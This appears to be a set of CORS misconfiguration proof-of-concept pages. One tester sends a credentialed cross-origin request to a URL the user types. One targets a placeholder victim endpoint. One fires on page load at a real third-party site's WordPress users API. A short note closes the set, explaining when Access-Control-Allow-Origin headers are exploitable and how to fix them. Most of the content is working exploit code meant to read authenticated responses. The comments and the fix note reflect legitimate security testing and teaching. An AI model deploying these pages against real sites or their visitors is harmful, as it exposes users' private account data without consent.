Cross-Origin Resource Sharing (CORS)
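<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>CORS Test Exploit</title>
</head>
<body>
<h3>CORS Test Exploit</h3>
<!--
  CORS check page: sends a credentialed cross-origin GET to the URL typed
  below and reports whether the browser allowed this page to read the reply.
  Everything received from the tested server is rendered as plain text only.
-->
<label for="target">Target URL</label>
<input type="url" id="target" name="target" placeholder="Target URL" autocomplete="off"> <button type="button" id="run">Exploit Now!</button><br>
<pre id="result"></pre>
<script>
var resultBox = document.getElementById("result");

/*
 * Replace the contents of #result with the given items.
 * Strings become text nodes, so nothing that originates from the tested
 * server is ever parsed as HTML inside this page.
 */
function render(items) {
  resultBox.textContent = "";
  items.forEach(function (item) {
    resultBox.appendChild(
      typeof item === "string" ? document.createTextNode(item) : item
    );
  });
}

/*
 * Read the target URL from the input, send a credentialed GET and report
 * the outcome in #result.
 */
function submit() {
  var url = document.getElementsByName("target")[0].value;

  // An empty or relative value resolves against this page itself, and a
  // same-origin request always succeeds, which would be reported as VULN.
  // Only absolute http(s) URLs on a different origin are meaningful here.
  var target;
  try {
    target = new URL(url);
  } catch (e) {
    render(["Target URL must be an absolute http(s) URL."]);
    return;
  }
  if (target.protocol !== "http:" && target.protocol !== "https:") {
    render(["Target URL must be an absolute http(s) URL."]);
    return;
  }
  if (target.origin === window.location.origin) {
    render(["Target URL is same-origin with this page; CORS is not involved."]);
    return;
  }

  alert("Tested CORS : " + url);
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function () {
    // Intermediate states carry no final status; wait for completion so the
    // "Not Vuln" message is not shown while the request is still in flight.
    if (this.readyState !== 4) {
      return;
    }
    if (this.status == 200) {
      // NOTE: a readable 200 shows that the target let the origin serving
      // this page read a credentialed response. It does not by itself show
      // that arbitrary origins are accepted.
      var verdict = document.createElement("b");
      verdict.textContent = "VULN";

      var body = document.createElement("textarea");
      body.style.margin = "0px";
      body.style.width = "411px";
      body.style.height = "436px";
      // .value keeps the response inert even if it contains markup such as
      // a closing textarea tag followed by a script element.
      body.value = this.responseText;

      render([
        "Respons (Status : ",
        verdict,
        " | status code : " + this.status + "):\n\n",
        body
      ]);
    } else {
      // Status 0 is what XHR reports when the browser withholds the
      // cross-origin response or the request fails at the network level.
      render([
        "Respons (status : Not Vuln) : respons tidak ada , status code " + this.status
      ]);
    }
  };
  xhttp.open("GET", url, true);
  xhttp.withCredentials = true;
  xhttp.send();
}

document.getElementById("run").addEventListener("click", submit);
</script>
</body>
</html>
________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________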
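<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>CORS PoC</title>
</head>
<body>
<h2>CORS PoC</h2>
<!--
  Sends one credentialed cross-origin GET to the hard-coded endpoint and
  shows the response body when the browser allows this page to read it.
-->
<div id="demo">
<button type="button" id="run">Exploit</button>
</div>
<pre id="response"></pre>
<script>
/*
 * Issue the credentialed request. On a readable 200 the body is shown in an
 * alert and written, as plain text, into #response.
 */
function cors() {
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function () {
    if (this.readyState == 4 && this.status == 200) {
      alert(this.responseText);
      // The original assigned the return value of alert() (undefined) to
      // innerHTML, which replaced the button with the text "undefined".
      // textContent displays the body without parsing it as HTML.
      document.getElementById("response").textContent = this.responseText;
    }
  };
  xhr.open("GET", "https://victim.example.com/endpoint", true);
  // Cookies and HTTP auth are attached; the browser exposes the response
  // only if the server's CORS headers permit this origin with credentials.
  xhr.withCredentials = true;
  xhr.send();
}

document.getElementById("run").addEventListener("click", cors);
</script>
</body>
</html>
________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________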
<html>
<script>
// Load handler: shows whatever response body the browser exposed to this page.
function reqListener() {
  alert(this.responseText);
}

// Credentialed cross-origin GET, sent as soon as the page loads. The body is
// only readable here when the server's CORS headers allow this origin.
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get', 'https://nordvpn.com/wp-json/wp/v2/users/1', true);
req.withCredentials = true;
// XHR ignores a request body on GET, so the '{}' argument is not transmitted.
req.send('{}');
</script>
</html>
________________________________________________________________________________________________________________________________________________________________________________________________________________________________
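Access-Control-Allow-Origin: * vuln (but browsers refuse to expose a wildcard response to a request sent with credentials, so the withCredentials PoCs above only read data when the server echoes the requesting Origin and also sends Access-Control-Allow-Credentials: true)
Access-Control-Allow-Origin: https://www.goodweb.com not vuln (a fixed trusted origin; the fix is an explicit allow-list of origins rather than reflecting the Origin header)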